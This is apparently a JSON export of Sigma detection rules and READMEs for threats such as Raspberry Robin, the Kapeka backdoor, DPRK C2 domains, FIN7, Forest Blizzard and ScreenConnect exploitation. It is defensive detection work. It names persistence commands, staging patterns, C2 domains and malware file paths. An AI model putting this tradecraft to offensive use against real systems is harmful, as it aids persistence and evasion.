    "content": "title: Potential Raspberry Robin Aclui Dll SideLoading\nid: 0f3a9db2-c17a-480e-a723-d1f1c547ab6a\nstatus: test\ndescription: |\n    Detects potential sideloading of a malicious \"aclui.dll\" by OleView. This behavior was observed in Raspberry Robin variants reported by Check Point Research in February 2024.\nreferences:\n    - https://research.checkpoint.com/2024/raspberry-robin-keeps-riding-the-wave-of-endless-1-days/\n    - https://globetech.biz/index.php/2023/05/19/evading-edr-by-dll-sideloading-in-csharp/\n    - https://decoded.avast.io/threatintel/apt-treasure-trove-avast-suspects-chinese-apt-group-mustang-panda-is-collecting-data-from-burmese-government-agencies-and-opposition-groups/\n    - https://www.hexacorn.com/blog/2016/03/10/beyond-good-ol-run-key-part-36/\n    - https://strontic.github.io/xcyclopedia/library/aclui.dll-F883E9CA757B622B032FDCA5BF33D0DF.html\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-31\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1574.001\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\OleView.exe'\n        ImageLoaded|endswith: '\\aclui.dll'\n    filter_main_legit_oleview_paths:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Windows Kits\\'\n            - 'C:\\Program Files\\Microsoft SDKs\\'\n    filter_optional_known_oleview_paths:\n        Image|contains: '\\Windows Resource Kit\\'\n    filter_main_is_signed:\n        Signed: 'true'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/Raspberry-Robin/proc_creation_win_malware_raspberry_robin_rundll32_shell32_cpl_exection.yml",
    "content": "title: Potential Raspberry Robin CPL Execution Activity\nid: 92020b88-9caf-464f-bad8-cd0fb0aa2a81\nstatus: test\ndescription: |\n    Detects the execution of a \".CPL\" file located in the user temp directory via the Shell32 DLL \"Control_RunDLL\" export function.\n    This behavior was observed in multiple Raspberry-Robin variants.\nreferences:\n    - https://tria.ge/240226-fhbe7sdc39/behavioral1\n    - https://bazaar.abuse.ch/browse/signature/RaspberryRobin/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-03-07\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # Example: \"C:\\Windows\\system32\\rundll32.exe\" Shell32.dll,Control_RunDLL \"C:\\Users\\xxxx\\AppData\\Local\\Temp\\xxxx.CPL\"\n    selection_parent_img:\n        ParentImage|endswith:\n            - '\\rundll32.exe'\n            - '\\control.exe'\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'shell32.dll'\n            - 'Control_RunDLL'\n            - '.CPL'\n    selection_path:\n        CommandLine|contains: '\\AppData\\Local\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/Raspberry-Robin/registry_set_malware_raspberry_robin_internet_settings_zonemap_tamper.yml",
    "content": "title: Potential Raspberry Robin Registry Set Internet Settings ZoneMap\nid: 16a4c7b3-4681-49d0-8d58-3e9b796dcb43\nstatus: test\ndescription: |\n    Detects registry modifications related to the proxy configuration of the system, potentially associated with the Raspberry Robin malware, as seen in campaigns running in Q1 2024.\n    Raspberry Robin may alter proxy and zone settings to circumvent security measures, ensuring an unhindered connection to its command and control servers where existing proxy settings would otherwise block the connection.\nreferences:\n    - https://tria.ge/240225-jlylpafb24/behavioral1/analog?main_event=Registry&op=SetValueKeyInt\n    - https://tria.ge/240307-1hlldsfe7t/behavioral2/analog?main_event=Registry&op=SetValueKeyInt\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_ProxyByPass\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_UNCAsIntranet\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_IncludeUnspecifiedLocalSites\n    - https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::SecurityPage_AutoDetect\n    - https://bazaar.abuse.ch/browse/signature/RaspberryRobin/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-31\ntags:\n    - attack.persistence\n    - attack.t1112\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\n    definition: 'Requirements: The registry key \"\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\\" and its sub keys must be monitored'\ndetection:\n    selection_registry_image:\n        - Image|contains:\n              - '\\AppData\\Local\\Temp\\'\n              - '\\Downloads\\'\n              - '\\Users\\Public\\'\n              - '\\Windows\\Temp\\'\n        - Image|endswith: '\\control.exe'\n    selection_registry_object:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\'\n    selection_value_enable:\n        TargetObject|endswith:\n            - '\\IntranetName'\n            - '\\ProxyByPass'\n            - '\\UNCAsIntranet'\n        Details|contains: 'DWORD (0x00000001)'\n    selection_value_disable:\n        TargetObject|endswith: '\\AutoDetect'\n        Details|contains: 'DWORD (0x00000000)'\n    condition: all of selection_registry_* and 1 of selection_value_*\nfalsepositives:\n    - Unknown\n# Note: can be upgraded to medium after an initial baseline\nlevel: low\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/Kapeka.md",
    "content": "# Kapeka backdoor\n\nKapeka has been used in assaults against people in Eastern Europe since at least the middle of 2022. Microsoft originally identified the [Kapeka backdoor](https://www.securityweek.com/kapeka-a-new-backdoor-in-sandworms-arsenal-of-aggression/). In a brief explanation released on February 14, 2024, Microsoft referred to this new backdoor as \"KnuckleTouch\" and linked it to a threat actor organization known as SeaShell Blizzard, which is also the name of the notorious Sandworm gang.\n\nHowever, it is the security firm [WithSecure](https://labs.withsecure.com/publications/kapeka) that has conducted an in-depth analysis of Kapeka. WithSecure believes that KnuckleTouch is indeed the same as Kapeka. Their assessment suggests that Kapeka is a tool used by an APT (Advanced Persistent Threat) group. \n\nDespite limited public knowledge about Kapeka, WithSecure has identified its use in specific incidents, particularly in regions like Estonia and Ukraine. Kapeka’s stealth mechanisms allow it to maintain persistence and evade detection. If successfully delivered, it can serve as a powerful tool for long-term cyberespionage.\n\n## Rules\n\n- [Potential Kapeka Decrypted Backdoor Indicator](./file_event_win_malware_kapeka_backdoor_indicators.yml)\n- [Kapeka Backdoor Loaded Via Rundll32.EXE](./image_load_malware_kapeka_backdoor_wll.yml)\n- [Kapeka Backdoor Persistence Activity](./proc_creation_win_malware_kapeka_backdoor_persistence.yml)\n- [Kapeka Backdoor Execution Via RunDLL32.EXE](./proc_creation_win_malware_kapeka_backdoor_rundll32_execution.yml)\n- [Kapeka Backdoor Autorun Persistence](./registry_set_malware_kapeka_backdoor_autorun_persistence.yml)\n- [Kapeka Backdoor Configuration Persistence](./registry_set_malware_kapeka_backdoor_configuration.yml)\n- [Kapeka Backdoor Scheduled Task Creation](./win_security_malware_kapeka_backdoor_scheduled_task_creation.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/file_event_win_malware_kapeka_backdoor_indicators.yml",
    "content": "title: Potential Kapeka Decrypted Backdoor Indicator\nid: 20228d05-dd68-435d-8b4e-e7e64938880c\nstatus: test\ndescription: |\n    Detects the presence of a file that is the decrypted backdoor binary dropped by the Kapeka dropper, which disguises itself as a hidden file under a folder named \"Microsoft\" within \"CSIDL_COMMON_APPDATA\" or \"CSIDL_LOCAL_APPDATA\", depending on the process privileges.\n    The file name is typically 5-6 characters long, a random combination of consonants and vowels, followed by a \".wll\" extension so that it poses as a legitimate Word add-in file and evades detection.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nauthor: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-03\ntags:\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_generic:\n        TargetFilename|contains:\n            - ':\\ProgramData\\'\n            - '\\AppData\\Local\\'\n        TargetFilename|re: '\\\\[a-zA-Z]{5,6}\\.wll'\n    selection_specific:\n        TargetFilename|endswith:\n            - '\\win32log.exe'\n            - '\\crdss.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/image_load_malware_kapeka_backdoor_wll.yml",
    "content": "title: Kapeka Backdoor Loaded Via Rundll32.EXE\nid: a7e6b1f9-8d2c-4f1e-9a7d-63e4c8a2bf4c\nstatus: test\ndescription: |\n    Detects the Kapeka Backdoor binary being loaded by rundll32.exe.\n    The Kapeka loader drops a backdoor, which is a DLL with the '.wll' extension masquerading as a Microsoft Word Add-In.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-03\ntags:\n    - attack.execution\n    - attack.t1204.002\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: image_load\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\rundll32.exe'\n        ImageLoaded|contains:\n            - ':\\ProgramData'\n            - '\\AppData\\Local\\'\n        ImageLoaded|re: '[a-zA-Z]{5,6}\\.wll'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/proc_creation_win_malware_kapeka_backdoor_persistence.yml",
    "content": "title: Kapeka Backdoor Persistence Activity\nid: 64a871dd-83f6-4e5f-80fc-5a7ca3a8a819\nstatus: test\ndescription: |\n    Detects Kapeka backdoor persistence activity.\n    Depending on the process privileges, the Kapeka dropper then sets persistence for the backdoor either as a scheduled task (if admin or SYSTEM) or autorun registry (if not).\n    For the scheduled task, it creates a scheduled task called \"Sens Api\" via schtasks command, which is set to run upon system startup as SYSTEM.\n    To establish persistence through the autorun utility, it adds an autorun entry called \"Sens Api\" under HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run via the \"reg add\" command.\n    Both persistence mechanisms are set to launch the binary by calling rundll32 and passing the backdoor's first export ordinal (#1) without any additional argument.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\n    - https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-03\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_schtasks_img:\n        - Image|endswith: '\\schtasks.exe'\n        - OriginalFileName: 'schtasks.exe'\n    selection_schtasks_flags:\n        CommandLine|contains|all:\n            - 'create'\n            - 'ONSTART'\n    selection_reg_img:\n        - Image|endswith: '\\reg.exe'\n        - OriginalFileName: 'reg.exe'\n    selection_reg_flags:\n        CommandLine|contains|all:\n            - 'add'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Run'\n    selection_backdoor_command:\n        CommandLine|contains|all:\n            - 'rundll32'\n            - '.wll'\n            - '#1'\n        CommandLine|contains:\n            - 'Sens Api'\n            - 'OneDrive' # The scheduled task was called \"OneDrive\" instead of \"Sens Api\" in some cases\n    condition: (all of selection_schtasks_* or all of selection_reg_*) and selection_backdoor_command\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/proc_creation_win_malware_kapeka_backdoor_rundll32_execution.yml",
    "content": "title: Kapeka Backdoor Execution Via RunDLL32.EXE\nid: e98f741c-6a5b-4c83-bc2a-1f4e58d07b12\nstatus: test\ndescription: |\n    Detects the Kapeka backdoor process execution pattern, where the dropper launches the backdoor binary by calling rundll32 and passing the backdoor's first export ordinal (#1) with a \"-d\" argument.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nauthor: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-07-03\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: 'RUNDLL32.EXE'\n    selection_backdoor_path:\n        CommandLine|contains:\n            - ':\\ProgramData'\n            - '\\AppData\\Local'\n    selection_backdoor_exec_1:\n        CommandLine|contains|all:\n            - '.wll'\n            - '#1'\n            - ' -d'\n    selection_backdoor_exec_2:\n        # This accounts for the in-the-wild variant\n        CommandLine|contains: '.wll'\n        CommandLine|endswith: '#1'\n    condition: selection_img and selection_backdoor_path and 1 of selection_backdoor_exec_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/registry_set_malware_kapeka_backdoor_autorun_persistence.yml",
    "content": "title: Kapeka Backdoor Autorun Persistence\nid: c0c67b21-eb8a-4c84-a395-40473ec3b482\nrelated:\n    - id: 64a871dd-83f6-4e5f-80fc-5a7ca3a8a819\n      type: similar\nstatus: test\ndescription: Detects the setting of a new value in the Autorun key that is used by the Kapeka backdoor for persistence.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-03\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run'\n        TargetObject|endswith:\n            - '\\Sens Api'\n            - '\\OneDrive'\n        Details|contains|all:\n            - ':\\WINDOWS\\system32\\rundll32.exe'\n            - '.wll'\n            - '#1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/registry_set_malware_kapeka_backdoor_configuration.yml",
    "content": "title: Kapeka Backdoor Configuration Persistence\nid: cbaa3ef3-07a9-4c8e-82d1-9e40578da7fd\nstatus: test\ndescription: |\n    Detects registry set activity of a value called \"Seed\" stored in the \"\\Cryptography\\Providers\\\" registry key.\n    The Kapeka backdoor leverages this location to register a new SIP provider for backdoor configuration persistence.\nreferences:\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-03\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1553.003\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\Microsoft\\Cryptography\\Providers\\{'\n        TargetObject|endswith: '\\Seed'\n    filter_main_empty:\n        Details|contains: '(Empty)'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/Malware/kapeka/win_security_malware_kapeka_backdoor_scheduled_task_creation.yml",
    "content": "title: Kapeka Backdoor Scheduled Task Creation\nid: 6c130acd-0adb-4545-bcc4-2e85d0883c9a\nrelated:\n    - id: 64a871dd-83f6-4e5f-80fc-5a7ca3a8a819\n      type: similar\nstatus: test\ndescription: Detects Kapeka backdoor scheduled task creation based on attributes such as paths, command line flags, etc.\nreferences:\n    - https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698\n    - https://labs.withsecure.com/publications/kapeka\n    - https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\n    - https://www.virustotal.com/gui/file/bd07fb1e9b4768e7202de6cc454c78c6891270af02085c51fce5539db1386c3f/behavior\nauthor: Swachchhanda Shrawan Poudel\ndate: 2024-07-03\ntags:\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1053.005\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    service: security\n    definition: 'Requirements: The Advanced Audit Policy setting Object Access > Audit Other Object Access Events has to be configured to trigger this detection.'\ndetection:\n    selection_eid:\n        EventID: 4698\n    selection_paths:\n        TaskContent|contains:\n            - ':\\ProgramData\\'\n            - '\\AppData\\Local\\'\n    selection_command:\n        TaskContent|contains|all:\n            - 'rundll32'\n            - '.wll'\n            - '#1'\n    selection_taskname:\n        TaskContent|contains:\n            - 'OneDrive' # The scheduled task was called \"OneDrive\" instead of \"Sens Api\" in some cases\n            - 'Sens Api'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/DPRK/dns_query_win_apt_dprk_malicious_domains.yml",
    "content": "title: DPRK Threat Actor - C2 Communication DNS Indicators\nid: 4d16c9a6-4362-4863-9940-1dee35f1d70f\nstatus: test\ndescription: Detects DNS queries for C2 domains used by DPRK Threat actors.\nreferences:\n    - https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2024-02-19-joint-cyber-security-advisory-englisch.pdf?__blob=publicationFile&v=2\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-20\ntags:\n    - attack.command-and-control\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName:\n            - 'connection.lockscreen.kro.kr'\n            - 'updating.dothome.co.kr'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/FIN7/proc_creation_win_apt_fin7_exploitation_indicators.yml",
    "content": "title: Potential APT FIN7 Exploitation Activity\nid: 6676896b-2cce-422d-82af-5a1abe65e241\nstatus: test\ndescription: |\n    Detects potential APT FIN7 exploitation activity as reported by Google.\n    In order to obtain initial access, FIN7 used compromised Remote Desktop Protocol (RDP) credentials to log in to a target server and initiate specific Windows process chains.\nreferences:\n    - https://cloud.google.com/blog/topics/threat-intelligence/evolution-of-fin7/\nauthor: Alex Walston (@4ayymm)\ndate: 2024-07-29\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.t1059.003\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_notepad_plus:\n        ParentImage|endswith: '\\notepad++.exe'\n        Image|endswith: '\\cmd.exe'\n    selection_rdpinit:\n        ParentImage|endswith: '\\rdpinit.exe'\n        Image|endswith: '\\notepad++.exe'\n    condition: 1 of selection_*\nfalsepositives:\n    - Notepad++ can legitimately spawn cmd (Open Containing Folder in CMD)\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/README.md",
    "content": "# Forest Blizzard’s Exploiting CVE-2022-38028\n\n## Summary\n\nMicrosoft Threat Intelligence published results of their longstanding investigation into activity by the Russian-based threat actor Forest Blizzard (STRONTIUM) using a custom tool to elevate privileges and steal credentials in compromised networks. Since at least June 2020 and possibly as early as April 2019, Forest Blizzard has used the tool, which we refer to as GooseEgg, to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions. \n\nYou can find more information on the threat in the following articles:\n\n- [Analyzing Forest Blizzard’s custom post-compromise tool for exploiting CVE-2022-38028 to obtain credentials](https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/)\n\n## Rules\n\n- [Forest Blizzard APT - File Creation Activity](./file_event_win_apt_forest_blizzard_activity.yml)\n- [Forest Blizzard APT - JavaScript Constrained File Creation](./file_event_win_apt_forest_blizzard_constrained_js.yml)\n- [Forest Blizzard APT - Process Creation Activity](./proc_creation_win_apt_forest_blizzard_activity.yml)\n- [Forest Blizzard APT - Custom Protocol Handler DLL Registry Set](./registry_set_apt_forest_blizzard_custom_protocol_handler.yml)\n- [Forest Blizzard APT - Custom Protocol Handler Creation](./registry_set_apt_forest_blizzard_custom_protocol_handler_dll.yml)\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/file_event_win_apt_forest_blizzard_activity.yml",
    "content": "title: Forest Blizzard APT - File Creation Activity\nid: b92d1d19-f5c9-4ed6-bbd5-7476709dc389\nstatus: test\ndescription: |\n    Detects the creation of specific files inside of ProgramData directory.\n    These files were seen being created by Forest Blizzard as described by MSFT.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-23\nmodified: 2024-07-11\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection_programdata_driver_store:\n        TargetFilename|startswith:\n            - 'C:\\ProgramData\\Microsoft\\v'\n            - 'C:\\ProgramData\\Adobe\\v'\n            - 'C:\\ProgramData\\Comms\\v'\n            - 'C:\\ProgramData\\Intel\\v'\n            - 'C:\\ProgramData\\Kaspersky Lab\\v'\n            - 'C:\\ProgramData\\Bitdefender\\v'\n            - 'C:\\ProgramData\\ESET\\v'\n            - 'C:\\ProgramData\\NVIDIA\\v'\n            - 'C:\\ProgramData\\UbiSoft\\v'\n            - 'C:\\ProgramData\\Steam\\v'\n        TargetFilename|contains:\n            - '\\prnms003.inf_'\n            - '\\prnms009.inf_'\n    selection_programdata_main:\n        TargetFilename|startswith: 'C:\\ProgramData\\'\n    selection_programdata_files_1:\n        TargetFilename|endswith:\n            - '.save'\n            - '\\doit.bat'\n            - '\\execute.bat'\n            - '\\servtask.bat'\n        # Hashes|contains: '7d51e5cc51c43da5deae5fbc2dce9b85c0656c465bb25ab6bd063a503c1806a9' # Uncomment this if you collect hash information in file events\n    selection_programdata_files_2:\n        TargetFilename|contains: '\\wayzgoose'\n        TargetFilename|endswith: '.dll'\n    condition: selection_programdata_driver_store or (selection_programdata_main and 1 of selection_programdata_files_*)\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/file_event_win_apt_forest_blizzard_constrained_js.yml",
    "content": "title: Forest Blizzard APT - JavaScript Constrained File Creation\nid: ec7c4e9b-9bc9-47c7-a32f-b53b598da642\nstatus: test\ndescription: |\n    Detects the creation of JavaScript files inside of the DriverStore directory.\n    Forest Blizzard used this to exploit the CVE-2022-38028 vulnerability in Windows Print Spooler service by modifying a JavaScript constraints file and executing it with SYSTEM-level permissions.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-23\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\n    - detection.emerging-threats\nlogsource:\n    category: file_event\n    product: windows\ndetection:\n    selection:\n        TargetFilename|startswith: 'C:\\Windows\\System32\\DriverStore\\FileRepository\\'\n        TargetFilename|endswith: '\\.js'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/proc_creation_win_apt_forest_blizzard_activity.yml",
    "content": "title: Forest Blizzard APT - Process Creation Activity\nid: 07db928c-8632-488e-ac7d-3db847489175\nstatus: experimental\ndescription: |\n    Detects the execution of specific processes and command line combinations.\n    These were seen being created by Forest Blizzard as described by MSFT.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-23\nmodified: 2025-01-22\ntags:\n    - attack.defense-evasion\n    - attack.execution\n    - detection.emerging-threats\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_hashes:\n        Hashes|contains:\n            - 'SHA256=6b311c0a977d21e772ac4e99762234da852bbf84293386fbe78622a96c0b052f'\n            - 'SHA256=c60ead92cd376b689d1b4450f2578b36ea0bf64f3963cfa5546279fa4424c2a5'\n    selection_schtasks_create:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - 'Create'\n            - '/RU'\n            - 'SYSTEM'\n            - '\\Microsoft\\Windows\\WinSrv'\n        CommandLine|contains:\n            - 'servtask.bat'\n            - 'execute.bat'\n            - 'doit.bat'\n    selection_schtasks_delete:\n        Image|endswith: '\\schtasks.exe'\n        CommandLine|contains|all:\n            - 'Delete'\n            - '/F '\n            - '\\Microsoft\\Windows\\WinSrv'\n    selection_powershell:\n        CommandLine|contains|all:\n            - 'Get-ChildItem'\n            - '.save'\n            - 'Compress-Archive -DestinationPath C:\\ProgramData\\'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/registry_set_apt_forest_blizzard_custom_protocol_handler.yml",
    "content": "title: Forest Blizzard APT - Custom Protocol Handler Creation\nid: 5cdeb555-65de-4767-99fe-e26807465148\nstatus: test\ndescription: |\n    Detects the setting of a custom protocol handler with the name \"rogue\".\n    Seen being created by Forest Blizzard APT as reported by MSFT.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\PROTOCOLS\\\\Handler\\rogue\\CLSID'\n        Details: '{026CC6D7-34B2-33D5-B551-CA31EB6CE345}'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/Forest-Blizzard/registry_set_apt_forest_blizzard_custom_protocol_handler_dll.yml",
    "content": "title: Forest Blizzard APT - Custom Protocol Handler DLL Registry Set\nid: d807056b-0e00-4cec-b7f8-b8b7518e382b\nstatus: test\ndescription: |\n    Detects the setting of the DLL that handles the custom protocol handler.\n    Seen being created by Forest Blizzard APT as reported by MSFT.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/04/22/analyzing-forest-blizzards-custom-post-compromise-tool-for-exploiting-cve-2022-38028-to-obtain-credentials/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-04-23\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\n    - detection.emerging-threats\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\CLSID\\{026CC6D7-34B2-33D5-B551-CA31EB6CE345}\\Server'\n        Details|endswith: '.dll'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2024/TA/SlashAndGrab-Exploitation-In-Wild/file_event_win_apt_unknown_exploitation_indicators.yml",
    "content": "title: ScreenConnect - SlashAndGrab Exploitation Indicators\nid: 05164d17-8e11-4d7d-973e-9e4962436b87\nstatus: test\ndescription: |\n    Detects indicators of exploitation by threat actors during exploitation of the \"SlashAndGrab\" vulnerability related to ScreenConnect, as reported by Team Huntress.\nreferences:\n    - https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-23\ntags:\n    - attack.defense-evasion\n    - detection.emerging-threats\nlogsource:\n    product: windows\n    category: file_event\ndetection:\n    selection:\n        - TargetFilename|contains|all:\n              - 'C:\\Windows\\Temp\\ScreenConnect\\'\n              - '\\LB3.exe'\n        - TargetFilename|contains:\n              - 'C:\\mpyutd.msi'\n              - 'C:\\perflogs\\RunSchedulerTaskOnce.ps1'\n              - 'C:\\ProgramData\\1.msi'\n              - 'C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\mpyutd.msi'\n              - 'C:\\ProgramData\\update.dat'\n              - 'C:\\Users\\oldadmin\\Documents\\MilsoftConnect\\Files\\ta.exe'\n              - 'C:\\Windows\\Help\\Help\\SentinelAgentCore.dll'\n              - 'C:\\Windows\\Help\\Help\\SentinelUI.exe'\n              - 'C:\\Windows\\spsrv.exe'\n              - 'C:\\Windows\\Temp\\svchost.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules-emerging-threats/2025/Exploits/CVE-2025-10035/proc_creation_win_exploit_cve_2025_10035.yml",
